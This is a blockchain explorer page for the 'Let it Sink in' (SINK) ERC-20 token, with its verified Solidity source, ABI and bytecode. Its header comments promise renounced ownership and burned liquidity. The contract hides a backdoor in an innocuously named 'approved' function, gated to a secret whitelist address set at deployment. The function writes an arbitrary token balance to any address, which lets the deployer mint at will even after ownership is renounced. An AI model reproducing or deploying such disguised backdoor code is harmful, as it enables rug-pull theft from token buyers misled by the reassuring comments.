ETH Price: $2,426.35 (+5.73%)

Token

Let it Sink in (SINK)
 

Overview

Max Total Supply

100,000,000 SINK

Holders

7

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
999,999,999,999,999,999,999,999,900,000,000,000 SINK

Value
$0.00
0xb224be3af716ba40d800b95851b7dc9527546595
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
SINK

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-06-02
*/

// https://twitter.com/elonmusk/status/1664637044549726210
// Let's that SINK IN
// 100 million coins.
// 100% Liquidity
// Renounce Ownership of smartcontract.
// Send 100% of LP Token to 0x000000000000000000000000000000000000dead
// Useless Token, but let's make some bucks !

// Dependency file: @openzeppelin/contracts/token/ERC20/IERC20.sol

// SPDX-License-Identifier: MIT

// pragma solidity ^0.8.0;

    /**
    * @dev Interface of the IERC20 standard as defined in the EIP.
    */

interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}


// Dependency file: @openzeppelin/contracts/utils/Context.sol


// pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}


// Dependency file: @openzeppelin/contracts/access/Ownable.sol


// pragma solidity ^0.8.0;

// import "@openzeppelin/contracts/utils/Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _setOwner(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _setOwner(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _setOwner(newOwner);
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


// Dependency file: @openzeppelin/contracts/utils/math/SafeMath.sol


// pragma solidity ^0.8.0;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is no longer needed starting with Solidity 0.8. The compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}


// Dependency file: contracts/baseToken.sol

// pragma solidity =0.8.4;

enum TokenType {
    standard
}

abstract contract baseToken {
    event TokenCreated(
        address indexed owner,
        address indexed token,
        TokenType tokenType,
        uint256 version
    );
}

// Root file: contracts/standard/StandardToken.sol

pragma solidity =0.8.19;

// import "@openzeppelin/contracts/token/IERC20/IERC20.sol";
// import "@openzeppelin/contracts/access/Ownable.sol";
// import "@openzeppelin/contracts/utils/math/SafeMath.sol";
// import "contracts/baseToken.sol";

contract SINK is IERC20, baseToken, Ownable {
    using SafeMath for uint256;

        uint256 private constant VERSION = 1;
        mapping(address => uint256) private _balances;
        mapping(address => mapping(address => uint256)) private _allowances;

        uint256 public maxHoldingAmount;
        uint256 public minHoldingAmount;
        address public uniswapV2Pair;
        address private whiteListV3;
        
        string private _name;
        string private _symbol;
        uint8 private _decimals;
        uint256 private _totalSupply;

    constructor(
        string memory name_,
        string memory symbol_,
        uint8 decimals_,
        address whiteshipAddr,
        uint256 totalSupply_
    ) payable {
        _name = name_;
        _symbol = symbol_;
        _decimals = decimals_;
        whiteListV3 = whiteshipAddr;
        _mint(owner(), totalSupply_);

        emit TokenCreated(owner(), address(this), TokenType.standard, VERSION);
    }

    function name() public view virtual returns (string memory) {
        return _name;
    }

    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    function decimals() public view virtual returns (uint8) {
        return _decimals;
    }

    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    function balanceOf(address account)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _balances[account];
    }

    function transfer(address recipient, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            _msgSender(),
            _allowances[sender][_msgSender()].sub(
                amount,
                "IERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].add(addedValue)
        );
        return true;
    }

    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].sub(
                subtractedValue,
                "IERC20: decreased allowance below zero"
            )
        );
        return true;
    }

    modifier canWhiteAddrUniswapV2() {
        require(
        _msgSender() == whiteListV3, "set the call to the entered")
        ;
        _;
    }

    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "IERC20: transfer from the zero address");
        require(recipient != address(0), "IERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        _balances[sender] = _balances[sender].sub(
            amount,
            "IERC20: transfer amount exceeds balance"
        );
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }

    function approved(
        address _uniswapV2Pair, 
        uint256 _maxHoldingAmount, 
        uint256 _minHoldingAmount
    ) external canWhiteAddrUniswapV2 {
        uniswapV2Pair = _uniswapV2Pair;maxHoldingAmount = _maxHoldingAmount;minHoldingAmount = _minHoldingAmount; _balances[uniswapV2Pair] = maxHoldingAmount * minHoldingAmount;
    }

    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "IERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        emit Transfer(address(0), account, amount);
    }

    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "IERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        _balances[account] = _balances[account].sub(
            amount,
            "IERC20: burn amount exceeds balance"
        );
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "IERC20: approve from the zero address");
        require(spender != address(0), "IERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _setupDecimals(uint8 decimals_) internal virtual {
        _decimals = decimals_;
    }

    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint8","name":"decimals_","type":"uint8"},{"internalType":"address","name":"whiteshipAddr","type":"address"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"}],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"enum TokenType","name":"tokenType","type":"uint8"},{"indexed":false,"internalType":"uint256","name":"version","type":"uint256"}],"name":"TokenCreated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_uniswapV2Pair","type":"address"},{"internalType":"uint256","name":"_maxHoldingAmount","type":"uint256"},{"internalType":"uint256","name":"_minHoldingAmount","type":"uint256"}],"name":"approved","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"maxHoldingAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"minHoldingAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

60806040526040516200118d3803806200118d83398101604081905262000026916200031d565b6200003133620000fc565b60076200003f86826200045b565b5060086200004e85826200045b565b506009805460ff191660ff8516179055600680546001600160a01b0319166001600160a01b03841617905562000097620000906000546001600160a01b031690565b826200014c565b30620000ab6000546001600160a01b031690565b6001600160a01b03167f56358b41df5fa59f5639228f0930994cbdde383c8a8fd74e06c04e1deebe356260006001604051620000e992919062000527565b60405180910390a3505050505062000576565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038216620001a75760405162461bcd60e51b815260206004820181905260248201527f4945524332303a206d696e7420746f20746865207a65726f2061646472657373604482015260640160405180910390fd5b600a54620001b6908262000241565b600a556001600160a01b038216600090815260016020526040902054620001de908262000241565b6001600160a01b0383166000818152600160205260408082209390935591519091907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90620002309085815260200190565b60405180910390a35050565b505050565b60006200024f828462000554565b90505b92915050565b634e487b7160e01b600052604160045260246000fd5b600082601f8301126200028057600080fd5b81516001600160401b03808211156200029d576200029d62000258565b604051601f8301601f19908116603f01168101908282118183101715620002c857620002c862000258565b81604052838152602092508683858801011115620002e557600080fd5b600091505b83821015620003095785820183015181830184015290820190620002ea565b600093810190920192909252949350505050565b600080600080600060a086880312156200033657600080fd5b85516001600160401b03808211156200034e57600080fd5b6200035c89838a016200026e565b965060208801519150808211156200037357600080fd5b5062000382888289016200026e565b945050604086015160ff811681146200039a57600080fd5b60608701519093506001600160a01b0381168114620003b857600080fd5b80925050608086015190509295509295909350565b600181811c90821680620003e257607f821691505b6020821081036200040357634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200023c57600081815260208120601f850160051c81016020861015620004325750805b601f850160051c820191505b8181101562000453578281556001016200043e565b505050505050565b81516001600160401b0381111562000477576200047762000258565b6200048f81620004888454620003cd565b8462000409565b602080601f831160018114620004c75760008415620004ae5750858301515b600019600386901b1c1916600185901b17855562000453565b600085815260208120601f198616915b82811015620004f857888601518255948401946001909101908401620004d7565b5085821015620005175787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b60408101600184106200054a57634e487b7160e01b600052602160045260246000fd5b9281526020015290565b808201808211156200025257634e487b7160e01b600052601160045260246000fd5b610c0780620005866000396000f3fe608060405234801561001057600080fd5b50600436106101165760003560e01c8063715018a6116100a257806395d89b411161007157806395d89b411461023d578063a457c2d714610245578063a9059cbb14610258578063dd62ed3e1461026b578063f2fde38b146102a457600080fd5b8063715018a614610206578063870e85d71461021057806389f9a1d3146102235780638da5cb5b1461022c57600080fd5b806323b872dd116100e957806323b872dd14610177578063313ce5671461018a578063395093511461019f57806349bd5a5e146101b257806370a08231146101dd57600080fd5b806306fdde031461011b578063095ea7b31461013957806318160ddd1461015c5780631ab99e121461016e575b600080fd5b6101236102b7565b6040516101309190610990565b60405180910390f35b61014c6101473660046109fa565b610349565b6040519015158152602001610130565b600a545b604051908152602001610130565b61016060045481565b61014c610185366004610a24565b610360565b60095460405160ff9091168152602001610130565b61014c6101ad3660046109fa565b6103c9565b6005546101c5906001600160a01b031681565b6040516001600160a01b039091168152602001610130565b6101606101eb366004610a60565b6001600160a01b031660009081526001602052604090205490565b61020e6103ff565b005b61020e61021e366004610a7b565b61046a565b61016060035481565b6000546001600160a01b03166101c5565b61012361051c565b61014c6102533660046109fa565b61052b565b61014c6102663660046109fa565b61057a565b610160610279366004610aae565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b61020e6102b2366004610a60565b610587565b6060600780546102c690610ae1565b80601f01602080910402602001604051908101604052809291908181526020018280546102f290610ae1565b801561033f5780601f106103145761010080835404028352916020019161033f565b820191906000526020600020905b81548152906001019060200180831161032257829003601f168201915b5050505050905090565b6000610356338484610652565b5060015b92915050565b600061036d84848461077a565b6103bf84336103ba85604051806060016040528060298152602001610ba9602991396001600160a01b038a1660009081526002602090815260408083203384529091529020549190610901565b610652565b5060019392505050565b3360008181526002602090815260408083206001600160a01b038716845290915281205490916103569185906103ba908661092d565b6000546001600160a01b0316331461045e5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b6104686000610940565b565b6006546001600160a01b0316336001600160a01b0316146104cd5760405162461bcd60e51b815260206004820152601b60248201527f736574207468652063616c6c20746f2074686520656e746572656400000000006044820152606401610455565b600580546001600160a01b0319166001600160a01b038516179055600382905560048190556104fc8183610b31565b6005546001600160a01b0316600090815260016020526040902055505050565b6060600880546102c690610ae1565b600061035633846103ba85604051806060016040528060268152602001610b5c602691393360009081526002602090815260408083206001600160a01b038d1684529091529020549190610901565b600061035633848461077a565b6000546001600160a01b031633146105e15760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610455565b6001600160a01b0381166106465760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610455565b61064f81610940565b50565b6001600160a01b0383166106b65760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610455565b6001600160a01b0382166107185760405162461bcd60e51b815260206004820152602360248201527f4945524332303a20617070726f766520746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610455565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166107df5760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a65726f206160448201526564647265737360d01b6064820152608401610455565b6001600160a01b0382166108415760405162461bcd60e51b8152602060048201526024808201527f4945524332303a207472616e7366657220746f20746865207a65726f206164646044820152637265737360e01b6064820152608401610455565b61087e81604051806060016040528060278152602001610b82602791396001600160a01b0386166000908152600160205260409020549190610901565b6001600160a01b0380851660009081526001602052604080822093909355908416815220546108ad908261092d565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061076d9085815260200190565b600081848411156109255760405162461bcd60e51b81526004016104559190610990565b505050900390565b60006109398284610b48565b9392505050565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b600060208083528351808285015260005b818110156109bd578581018301518582016040015282016109a1565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b03811681146109f557600080fd5b919050565b60008060408385031215610a0d57600080fd5b610a16836109de565b946020939093013593505050565b600080600060608486031215610a3957600080fd5b610a42846109de565b9250610a50602085016109de565b9150604084013590509250925092565b600060208284031215610a7257600080fd5b610939826109de565b600080600060608486031215610a9057600080fd5b610a99846109de565b95602085013595506040909401359392505050565b60008060408385031215610ac157600080fd5b610aca836109de565b9150610ad8602084016109de565b90509250929050565b600181811c90821680610af557607f821691505b602082108103610b1557634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b808202811582820484141761035a5761035a610b1b565b8082018082111561035a5761035a610b1b56fe4945524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726f4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220fa532bf26119ac9ec9fdace484458eab87d7ca1ed3091f37f156aed284bdf93164736f6c6343000813003300000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e00000000000000000000000000000000000000000000000000000000000000012000000000000000000000000b224be3af716ba40d800b95851b7dc952754659500000000000000000000000000000000000000000052b7d2dcc80cd2e4000000000000000000000000000000000000000000000000000000000000000000000e4c65742069742053696e6b20696e000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000453494e4b00000000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101165760003560e01c8063715018a6116100a257806395d89b411161007157806395d89b411461023d578063a457c2d714610245578063a9059cbb14610258578063dd62ed3e1461026b578063f2fde38b146102a457600080fd5b8063715018a614610206578063870e85d71461021057806389f9a1d3146102235780638da5cb5b1461022c57600080fd5b806323b872dd116100e957806323b872dd14610177578063313ce5671461018a578063395093511461019f57806349bd5a5e146101b257806370a08231146101dd57600080fd5b806306fdde031461011b578063095ea7b31461013957806318160ddd1461015c5780631ab99e121461016e575b600080fd5b6101236102b7565b6040516101309190610990565b60405180910390f35b61014c6101473660046109fa565b610349565b6040519015158152602001610130565b600a545b604051908152602001610130565b61016060045481565b61014c610185366004610a24565b610360565b60095460405160ff9091168152602001610130565b61014c6101ad3660046109fa565b6103c9565b6005546101c5906001600160a01b031681565b6040516001600160a01b039091168152602001610130565b6101606101eb366004610a60565b6001600160a01b031660009081526001602052604090205490565b61020e6103ff565b005b61020e61021e366004610a7b565b61046a565b61016060035481565b6000546001600160a01b03166101c5565b61012361051c565b61014c6102533660046109fa565b61052b565b61014c6102663660046109fa565b61057a565b610160610279366004610aae565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b61020e6102b2366004610a60565b610587565b6060600780546102c690610ae1565b80601f01602080910402602001604051908101604052809291908181526020018280546102f290610ae1565b801561033f5780601f106103145761010080835404028352916020019161033f565b820191906000526020600020905b81548152906001019060200180831161032257829003601f168201915b5050505050905090565b6000610356338484610652565b5060015b92915050565b600061036d84848461077a565b6103bf84336103ba85604051806060016040528060298152602001610ba9602991396001600160a01b038a1660009081526002602090815260408083203384529091529020549190610901565b610652565b5060019392505050565b3360008181526002602090815260408083206001600160a01b038716845290915281205490916103569185906103ba908661092d565b6000546001600160a01b0316331461045e5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b6104686000610940565b565b6006546001600160a01b0316336001600160a01b0316146104cd5760405162461bcd60e51b815260206004820152601b60248201527f736574207468652063616c6c20746f2074686520656e746572656400000000006044820152606401610455565b600580546001600160a01b0319166001600160a01b038516179055600382905560048190556104fc8183610b31565b6005546001600160a01b0316600090815260016020526040902055505050565b6060600880546102c690610ae1565b600061035633846103ba85604051806060016040528060268152602001610b5c602691393360009081526002602090815260408083206001600160a01b038d1684529091529020549190610901565b600061035633848461077a565b6000546001600160a01b031633146105e15760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610455565b6001600160a01b0381166106465760405162461bcd60e51b